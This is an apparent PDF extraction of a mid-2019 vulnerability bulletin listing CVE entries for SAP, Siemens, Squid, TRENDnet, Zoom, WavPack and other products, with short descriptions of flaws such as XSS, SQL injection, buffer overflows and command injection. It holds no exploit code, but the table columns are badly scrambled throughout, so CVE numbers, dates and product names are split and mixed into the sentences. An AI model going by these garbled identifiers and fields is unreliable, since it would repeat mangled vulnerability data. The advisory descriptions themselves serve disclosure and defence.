CV E- ABAP Server and ABAP not 201 Platform (SAP Basis), versions, 201 yet 9- sap -- 7.31, 7.4, 7.5, do not sufficiently 9- cal 032 abap_server_and_abap_platf encode user-controlled inputs, 07- cul 1 orm resulting in Cross-Site Scripting 10 ate BID (XSS) vulnerability. d MIS C CO Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
NFI RM
CV E- SAP BusinessObjects Business 201 Intelligence Platform (BI not 9- Workspace) (Enterprise), 201 yet 032 sap -- versions 4.1, 4.2, 4.3, does not 9- cal 6 businessobjects_business_in sufficiently encode user- 07- cul BID telligence_platform controlled inputs, resulting in 10 ate MIS Cross-Site Scripting (XSS) d C vulnerability. CO NFI RM
CV E- SAP Commerce Cloud 201 (previously known as SAP not 9- Hybris Commerce), (HY_COM, 201 yet 032 versions 6.3, 6.4, 6.5, 6.6, 6.7, 9- cal 2 sap -- commerce_cloud 1808, 1811), allows an attacker 07- cul BID to prevent legitimate users from 10 ate MIS accessing a service, either by d C crashing or flooding the service. CO NFI RM
The OS Command Plugin in the not CV transaction GPA_ADMIN and 201 yet E- the OSCommand Console of 9- cal 201 sap -- diagnostic_agent SAP Diagnostic Agent (LM- 07- cul 9- Service), version 7.2, allow an 10 ate 033 attacker to inject code that can d 0 Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
be executed by the application. BID An attacker could thereby MIS control the behavior of the C application. CO NFI RM
CV SAP ERP HCM (SAP_HRCES) E- , version 3, does not perform 201 necessary authorization checks not 9- for a report that reads payroll 201 yet 032 data of employees in a certain 9- cal 5 sap -- erp_hcm area. Due to this under certain 07- cul BID conditions, the user that once 10 ate MIS had authorization to payroll data d C of an employee, which was later CO revoked, may retain access to NFI the same data. RM
CV E- 201 Under certain conditions SAP not 9- NetWeaver Application Server 201 yet 031 sap -- for Java (Startup Framework), 9- cal 8 netweaver_application_serv versions 7.21, 7.22, 7.45, 7.49, 07- cul BID er and 7.53, allows an attacker to 10 ate MIS access information which would d C otherwise be restricted. CO NFI RM Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
CV E- SAP NetWeaver for Java 201 Application Server - Web not 9- Container, (engineapi, versions 201 yet 032 sap -- 7.1, 7.2, 7.3, 7.31, 7.4 and 7.5), 9- cal 7 netweaver_for_java_applica (servercode, versions 7.2, 7.3, 07- cul BID tion_server 7.31, 7.4, 7.5), allows an 10 ate MIS attacker to upload files d C (including script files) without CO proper file format validation. NFI RM
CV ABAP Tests Modules (SAP E- Basis, versions 7.0, 7.1, 7.3, 201 7.31, 7.4, 7.5) of SAP not 9- NetWeaver Process Integration 201 yet 032 sap -- enables an attacker the 9- cal 8 netweaver_process_integrati execution of OS commands with 07- cul BID on privileged rights. An attacker 10 ate MIS could thereby impact the d C integrity and availability of the CO system. NFI RM
CV The SAP Gateway, versions 7.5, E- 7.51, 7.52 and 7.53, allows an not 201 attacker to inject content which 201 yet 9- is displayed in the form of an 9- cal 031 sap -- sap_gateway error message. An attacker 07- cul 9 could thus mislead a user to 10 ate BID believe this information is from d MIS the legitimate service when it's C not. MIS Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
C CO NFI RM
CV E- 201 SAPUI5 and OpenUI5, before not 9- versions 1.38.39, 1.44.39, 201 yet 028 1.52.25, 1.60.6 and 1.63.0, does 9- cal 1 sap -- sapui5_and_openui5 not sufficiently encode user- 07- cul BID controlled inputs, resulting in 10 ate MIS Cross-Site Scripting (XSS) d C vulnerability. CO NFI RM
CV E- 201 9- 128 not 38 201 yet MIS SchedMD Slurm 17.11.x, 9- cal C schedmd -- slurm 18.08.0 through 18.08.7, and 07- cul CO 19.05.0 allows SQL Injection. 11 ate NFI d RM MIS C CO NFI RM Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
A vulnerability has been identified in SIMATIC PCS 7 V8.0 and earlier (All versions), SIMATIC PCS 7 V8.1 (All versions), SIMATIC PCS 7 V8.2 (All versions < V8.2 SP1 with WinCC V7.4 SP1 Upd11), SIMATIC PCS 7 V9.0 (All versions < V9.0 SP2 with WinCC V7.4 SP1 Upd11), SIMATIC WinCC Professional (TIA Portal V13) (All versions), SIMATIC WinCC Professional (TIA Portal V14) (All versions), SIMATIC WinCC Professional CV (TIA Portal V15) (All versions), E- not SIMATIC WinCC Runtime 201 201 yet siemens -- Professional V13 (All versions), 9- 9- cal simatic_pcs_7_and_simatic_ SIMATIC WinCC Runtime 109 07- cul wincc_products Professional V14 (All versions), 35 11 ate SIMATIC WinCC Runtime BID d Professional V15 (All versions), MIS SIMATIC WinCC V7.2 and C earlier (All versions), SIMATIC WinCC V7.3 (All versions), SIMATIC WinCC V7.4 (All versions < V7.4 SP1 Upd 11), SIMATIC WinCC V7.5 (All versions < V7.5 Upd 3). The SIMATIC WinCC DataMonitor web application of the affected products allows to upload arbitrary ASPX code. The security vulnerability could be exploited by an authenticated attacker with network access to the WinCC DataMonitor Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
application. No user interaction is required to exploit this vulnerability. The vulnerability impacts confidentiality, integrity, and availability of the affected device. At the stage of publishing this security advisory no public exploitation is known.
A vulnerability has been identified in SIPROTEC 5 device types 6MD85, 6MD86, 6MD89, 7UM85, 7SA87, 7SD87, 7SL87, 7VK87, 7SA82, 7SA86, 7SD82, 7SD86, 7SL82, 7SL86, 7SJ86, 7SK82, 7SK85, 7SJ82, 7SJ85, 7UT82, 7UT85, 7UT86, 7UT87 and 7VE85 with CPU variants CP300 and CP100 CV and the respective Ethernet not E- communication modules (All 201 yet 201 siemens -- versions < V7.90), All other 9- cal 9- siprotec_5_devices SIPROTEC 5 device types with 07- cul 109 CPU variants CP300 and CP100 11 ate 31 and the respective Ethernet d MIS communication modules (All C versions), SIPROTEC 5 relays with CPU variants CP200 and the respective Ethernet communication modules (All versions), DIGSI 5 engineering software (All versions < V7.90). Specially crafted packets sent to port 443/TCP could cause a Denial of Service condition. Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
A vulnerability has been identified in SIPROTEC 5 device types 6MD85, 6MD86, 6MD89, 7UM85, 7SA87, 7SD87, 7SL87, 7VK87, 7SA82, 7SA86, 7SD82, 7SD86, 7SL82, 7SL86, 7SJ86, 7SK82, 7SK85, 7SJ82, 7SJ85, 7UT82, 7UT85, 7UT86, 7UT87 and 7VE85 with CPU variants CP300 and CP100 and the respective Ethernet CV communication modules (All not E- versions < V7.90), All other 201 yet 201 siemens -- SIPROTEC 5 device types with 9- cal 9- siprotec_5_devices CPU variants CP300 and CP100 07- cul 109 and the respective Ethernet 11 ate 30 communication modules (All d MIS versions), SIPROTEC 5 relays C with CPU variants CP200 and the respective Ethernet communication modules (All versions), DIGSI 5 engineering software (All versions < V7.90). A remote attacker could use specially crafted packets sent to port 443/TCP to upload, download or delete files in certain parts of the file system.
A vulnerability has been not CV identified in Spectrum Power 3 201 yet E- (Corporate User Interface) (All siemens -- 9- cal 201 versions <= v3.11), Spectrum spectrum_power_products 07- cul 9- Power 4 (Corporate User 11 ate 109 Interface) (Version v4.75), d 33 Spectrum Power 5 (Corporate Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
User Interface) (All versions <= MIS v5.50), Spectrum Power 7 C (Corporate User Interface) (All versions <= v2.20). The web server could allow Cross-Site Scripting (XSS) attacks if unsuspecting users are tricked into accessing a malicious link. User interaction is required for a successful exploitation. The user does not need to be logged into the web interface in order for the exploitation to succeed. At the stage of publishing this security advisory no public exploitation is known.
A vulnerability has been identified in TIA Administrator (All versions < V1.0 SP1 Upd1). The integrated configuration web application (TIA Administrator) allows to execute CV certain application commands E- not without proper authentication. 201 201 yet The vulnerability could be 9- 9- cal siemens -- tia_administrator exploited by an attacker with 109 07- cul local access to the affected 15 11 ate system. Successful exploitation BID d requires no privileges and no MIS user interaction. An attacker C could use the vulnerability to compromise confidentiality and integrity and availability of the affected system. At the time of advisory publication no public Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
exploitation of this security vulnerability was known.
CV The Windows versions of not E- Snapview Mikogo, versions 201 yet 201 before 5.10.2 are affected by 9- cal 9- snapview -- mikogo insecure implementations which 07- cul 127 allow local attackers to escalate 12 ate 31 privileges. d MIS C
CV Sonatype Nexus Repository not E- Manager before 3.17.0 has a 201 yet 201 sonatype -- weak default of giving any 9- cal 9- nexus_repository_manager unauthenticated user read 07- cul 963 permissions on the repository 08 ate 0 files and images. d MIS C
CV not E- Sonatype Nexus Repository 201 yet 201 Manager before 3.17.0 sonatype -- 9- cal 9- establishes a default nexus_repository_manager 07- cul 962 administrator user with weak 08 ate 9 defaults (fixed credentials). d MIS C
201 not CV Sony BRAVIA Smart TV sony -- 9- yet E- devices allow remote attackers bravia_smart_tv_devices 07- cal 201 to cause a denial of service 09 cul 9- Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
(device hang) via a crafted web ate 118 page over HbbTV. d 89 MIS C FU LL DIS C MIS C MIS C
CV E- 201 9- 118 Sony Bravia Smart TV devices not 90 allow remote attackers to cause 201 yet MIS sony -- a denial of service (device hang 9- cal C bravia_smart_tv_devices or reboot) via a SYN flood 07- cul FU attack over a wired or Wi-Fi 09 ate LL LAN. d DIS C MIS C MIS C
An issue was discovered in not CV OWASP ModSecurity Core 201 yet E- spiderlabs -- Rule Set (CRS) 3.0.2. Use of 9- cal 201 owasp_modsecurity_core_ru X.Filename instead of 07- cul 9- le_set X_Filename can bypass some 09 ate 134 PHP Script Uploads rules, d 64 Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
because PHP automatically MIS transforms dots into underscores C in certain contexts where dots MIS are invalid. C
CV E- An issue was discovered in 201 Squid 4.0.23 through 4.7. When 9- checking Basic Authentication 125 not with HttpHeader::getAuth, 27 201 yet Squid uses a global buffer to CO 9- cal squid-cache -- squid store the decoded data. Squid NFI 07- cul does not check that the decoded RM 11 ate length isn't greater than the CO d buffer, leading to a heap-based NFI buffer overflow with user RM controlled data. CO NFI RM
An issue was discovered in CV Squid 3.3.9 through 3.5.28 and E- 4.x through 4.7. When Squid is 201 configured to use Digest 9- authentication, it parses the 125 not header Proxy-Authorization. It 25 201 yet searches for certain tokens such CO 9- cal squid-cache -- squid as domain, uri, and qop. Squid NFI 07- cul checks if this token's value starts RM 11 ate with a quote and ends with one. CO d If so, it performs a memcpy of NFI its length minus 2. Squid never RM checks whether the value is just CO a single quote (which would NFI satisfy its requirements), leading RM Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
to a memcpy of its length minus 1.
An issue was discovered in Squid 2.x through 2.7.STABLE9, 3.x through 3.5.28, and 4.x through 4.7. When Squid is configured to use CV Basic Authentication, the Proxy- E- Authorization header is parsed 201 via uudecode. uudecode 9- determines how many bytes will 125 not be decoded by iterating over the 29 201 yet input and checking its table. The CO 9- cal squid-cache -- squid length is then used to start NFI 07- cul decoding the string. There are RM 11 ate no checks to ensure that the CO d length it calculates isn't greater NFI than the input buffer. This leads RM to adjacent memory being CO decoded as well. An attacker NFI would not be able to retrieve the RM decoded data unless the Squid maintainer had configured the display of usernames on error pages.
An issue was discovered in CV STOPzilla AntiMalware not E- 6.5.2.59. The driver file 201 yet 201 stopzilla -- szkg64.sys contains an Arbitrary 9- cal 8- stopzilla_antimalware Write vulnerability due to not 07- cul 157 validating the output buffer 09 ate 38 address value from IOCtl d MIS 0x8000205F. C Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
MIS C
CV E- 201 9- The SUNNET WMPro v5.0 and 110 not v5.1 for eLearning system has 62 201 yet OS Command Injection via CO 9- cal sunnet -- wmpro "/teach/course/doajaxfileupload. NFI 07- cul php". The target server can be RM 11 ate exploited without CO d authentication. NFI RM CO NFI RM
An issue was discovered in SWIFT Alliance Web Platform 7.1.23. A log injection (and an CV arbitrary log filename) can be not E- achieved via the PATH_INFO 201 yet 201 to swift -- 9- cal 8- swp/login/EJBRemoteService/, alliance_web_platform 07- cul 163 related to 05 ate 86 com.swift.ejbgwt.j2ee.client.EjB d MIS lnvocationException error log C information containing null@java:comp/env/ error messages. symantec -- Symantec Messaging Gateway, 201 not CV messaging_gateway prior to 10.7.1, may be 9- yet E- Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
susceptible to a privilege 07- cal 201 escalation vulnerability, which 11 cul 9- is a type of issue whereby an ate 127 attacker may attempt to d 51 compromise the software BID application to gain elevated MIS access to resources that are C normally protected from an application or user.
CV E- An authorization bypass 201 vulnerability in pinboard 9- updates in ThoughtSpot 4.4.1 not 127 through 5.1.1 (before 5.1.2) 201 yet 82 allows a low-privilege user with 9- cal MIS thoughtspot -- thoughtspot write access to at least one 07- cul C pinboard to corrupt pinboards of 09 ate CO another user in the application d NFI by spoofing GUIDs in pinboard RM update requests, effectively CO deleting them. NFI RM
TRENDnet TEW-827DRU with firmware up to and including CV 2.04B03 contains multiple not E- stack-based buffer overflows 201 yet 201 when processing user input for 9- cal 9- trendnet -- tew-827dru the setup wizard, allowing an 07- cul 132 unauthenticated user to execute 10 ate 79 arbitrary code. The vulnerability d MIS can be exercised on the local C intranet or remotely if remote administration is enabled. Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
TRENDnet TEW-827DRU with firmware up to and including 2.04B03 allows an CV unauthenticated attacker to not E- execute setup wizard 201 yet 201 functionality, giving this 9- cal 9- trendnet -- tew-827dru attacker the ability to change 07- cul 132 configuration values, potentially 09 ate 77 leading to a denial of service. d MIS The request can be made on the C local intranet or remotely if remote administration is enabled.
TRENDnet TEW-827DRU with firmware up to and including 2.04B03 contains multiple CV command injections when not E- processing user input for the 201 yet 201 setup wizard, allowing an 9- cal 9- trendnet -- tew-827dru unauthenticated user to run 07- cul 132 arbitrary commands on the 10 ate 78 device. The vulnerability can be d MIS exercised on the local intranet or C remotely if remote administration is enabled.
TRENDnet TEW-827DRU with CV firmware up to and including not E- 2.04B03 contains a stack-based 201 yet 201 buffer overflow in the ssi 9- cal 9- trendnet -- tew-827dru binary. The overflow allows an 07- cul 132 unauthenticated user to execute 10 ate 76 arbitrary code by providing a d MIS sufficiently long query string C when POSTing to any valid cgi, Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
txt, asp, or js file. The vulnerability can be exercised on the local intranet or remotely if remote administration is enabled.
TRENDnet TEW-827DRU with firmware up to and including 2.04B03 contains a stack-based CV buffer overflow while returning not E- an error message to the user 201 yet 201 about failure to resolve a 9- cal 9- trendnet -- tew-827dru hostname during a ping or 07- cul 132 traceroute attempt. This allows 09 ate 80 an authenticated user to execute d MIS arbitrary code. The exploit can C be exercised on the local intranet or remotely if remote administration is enabled.
CV An issue was discovered in the E- America's Army Proving not 201 Grounds platform for the Unreal 201 yet 8- u.s._army -- Engine. With a false packet sent 9- cal 105 america's_army_proving_gr via UDP, the application server 07- cul 31 ounds responds with several bytes, 10 ate MIS giving the possibility of DoS d C amplification, even being able to MIS be used in DDoS attacks. C
Command Injection in 201 not CV ubiquiti_networks -- EdgeMAX EdgeSwitch prior to 9- yet E- edgemax_edgeswitch 1.8.2 allow an Admin user to 07- cal 201 execute commands as root. 10 cul 9- Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
ate 544 d 6 MIS C
CV not E- DoS in EdgeMAX EdgeSwitch 201 yet 201 prior to 1.8.2 allow an Admin ubiquiti_networks -- 9- cal 9- user to Crash the SSH CLI edgemax_edgeswitch 07- cul 544 interface by using crafted 10 ate 5 commands. d MIS C
CV E- not 201 VMware ESXi 6.5 suffers from 201 yet 9- partial denial of service 9- cal 552 vmware -- esxi vulnerability in hostd process. 07- cul 8 Patch ESXi650-201907201-UG 11 ate BID for this issue is available. d CO NFI RM
WavPack 5.1.0 and earlier is CV affected by: CWE-457: Use of E- Uninitialized Variable. The not 201 impact is: Unexpected control 201 yet 9- flow, crashes, and segfaults. The 9- cal wavpack -- wavpack 101 component is: 07- cul 031 ParseWave64HeaderConfig 11 ate 9 (wave64.c:211). The attack d MIS vector is: Maliciously crafted C .wav file. The fixed version is: Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
After commit MIS https://github.com/dbry/WavPac C k/commit/33a0025d1d63ccd05d 9dbaa6923d52b1446a62fe.
WavPack 5.1.0 and earlier is affected by: CWE-457: Use of CV Uninitialized Variable. The E- impact is: Unexpected control 201 flow, crashes, and segfaults. The not 9- component is: 201 yet 101 ParseCaffHeaderConfig 9- cal wavpack -- wavpack 031 (caff.c:486). The attack vector 07- cul 7 is: Maliciously crafted .wav file. 11 ate MIS The fixed version is: After d C commit MIS https://github.com/dbry/WavPac C k/commit/f68a9555b548306c5b 1ee45199ccdc4a16a6101b.
WavPack 5.1 and earlier is affected by: CWE 369: Divide by Zero. The impact is: Divide CV by zero can lead to sudden crash E- of a software/service that tries to 201 not parse a .wav file. The 9- 201 yet component is: 101 9- cal wavpack -- wavpack ParseDsdiffHeaderConfig 031 07- cul (dsdiff.c:282). The attack vector 5 11 ate is: Maliciously crafted .wav file. MIS d The fixed version is: After C commit MIS https://github.com/dbry/WavPac C k/commit/4c0faba32fddbd0745c bfaf1e1aeb3da5d35b9fc. Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
In WESEEK GROWI before 3.5.0, the site-wide basic CV authentication can be bypassed not E- by adding a URL parameter 201 yet 201 access_token (this is the 9- cal 9- weseek -- growi parameter used by the API). No 07- cul 133 valid token is required since it is 09 ate 37 not validated by the backend. d MIS The website can then be C browsed as if no basic authentication is required.
In WESEEK GROWI before CV 3.5.0, a remote attacker can not E- obtain the password hash of the 201 yet 201 creator of a page by leveraging 9- cal 9- weseek -- growi wiki access to make API calls 07- cul 133 for page metadata. In other 09 ate 38 words, the password hash can be d MIS retrieved even though it is not a C publicly available field.
CV E- WolfVision Cynap before 1.30j 201 uses a static, hard-coded 9- cryptographic secret for not 133 generating support PINs for the 201 yet 52 'forgot password' feature. By 9- cal MIS wolfvision -- cynap knowing this static secret and 07- cul C the corresponding algorithm for 05 ate FU calculating support PINs, an d LL attacker can reset the ADMIN DIS password and thus gain remote C access. MIS C Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
CV E- not 201 The Rencontre plugin before 201 yet 9- 3.1.3 for WordPress allows SQL 9- cal 134 wordpress -- wordpress Injection via 07- cul 13 inc/rencontre_widget.php. 08 ate MIS d C MIS C
CV E- not 201 201 yet 9- The Rencontre plugin before 9- cal 134 wordpress -- wordpress 3.1.3 for WordPress allows XSS 07- cul 14 via inc/rencontre_widget.php. 08 ate MIS d C MIS C
In ZeroMQ libzmq before 4.0.9, CV 4.1.x before 4.1.7, and 4.2.x E- before 4.3.2, a remote, 201 unauthenticated client 9- connecting to a libzmq not 131 application, running with a 201 yet 32 socket listening with CURVE 9- cal MLI zeromq -- libzmq encryption/authentication 07- cul ST enabled, may cause a stack 10 ate CO overflow and overwrite the stack d NFI with arbitrary data, due to a RM buffer overflow in the library. CO Users running public servers NFI with the above configuration are RM Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
highly encouraged to upgrade as MLI soon as possible, as there are no ST known mitigations. BU GT RA Q UB UN TU DE BIA N
CV E- not 201 An issue was discovered in 201 yet 9- zoho_manageengine -- Zoho ManageEngine 9- cal 125 assetexplorer AssetExplorer. There is XSS via 07- cul 37 the SearchN.do search field. 11 ate MIS d C MIS C
CV E- not 201 An issue was discovered in 201 yet 9- Zoho ManageEngine zoho_manageengine -- 9- cal 125 ServiceDesk Plus 10.5. There is servicedesk_plus 07- cul 40 XSS via the WorkOrder.do 11 ate MIS search field. d C MIS C Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
CV E- 201 9- 134 In the Zoom Client before 4.4.2 not 49 on macOS, remote attackers can 201 yet MIS cause a denial of service zoom_video_communicatio 9- cal C (continual focus grabs) via a ns -- zoom_client 07- cul MIS sequence of invalid 09 ate C launch?action=join&confno= d MIS requests to localhost port 19421. C MIS C MIS C
The Zoom Client before CV 4.4.53932.0709 on macOS E- allows remote code execution, a 201 different vulnerability than 9- CVE-2019-13450. If the 135 ZoomOpener daemon (aka the not 67 hidden web server) is running, 201 yet MIS but the Zoom Client is not zoom_video_communicatio 9- cal C installed or can't be opened, an ns -- zoom_client 07- cul MIS attacker can remotely execute 12 ate C code with a maliciously crafted d MIS launch URL. NOTE: C ZoomOpener is removed by the MIS Apple Malware Removal Tool C (MRT) if this tool is enabled MIS and has the 2019-07-10 C MRTConfigData. Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
CV In the Zoom Client through E- 4.4.4 and RingCentral 201 7.0.136380.0312 on macOS, 9- remote attackers can force a user 134 to join a video call with the 50 video camera active. This occurs BID because any web site can MIS interact with the Zoom web not C zoom_video_communicatio server on localhost port 19421 201 yet MIS ns -- or 19424. NOTE: a machine 9- cal C zoom_client_and_ringcentra remains vulnerable if the Zoom 07- cul MIS l Client was installed in the past 09 ate C and then uninstalled. Blocking d MIS exploitation requires additional C steps, such as the MIS ZDisableVideo preference C and/or killing the web server, MIS deleting the ~/.zoomus C directory, and creating a MIS ~/.zoomus plain file. C
CV ZTE MW NR8000V2.4.4.03 not E- and NR8000V2.4.4.04 are 201 yet 201 impacted by path traversal 9- cal 9- zte -- mw_nr8000 vulnerability. Due to path 07- cul 341 traversal,users can download 11 ate 5 any files. d MIS C
Back to top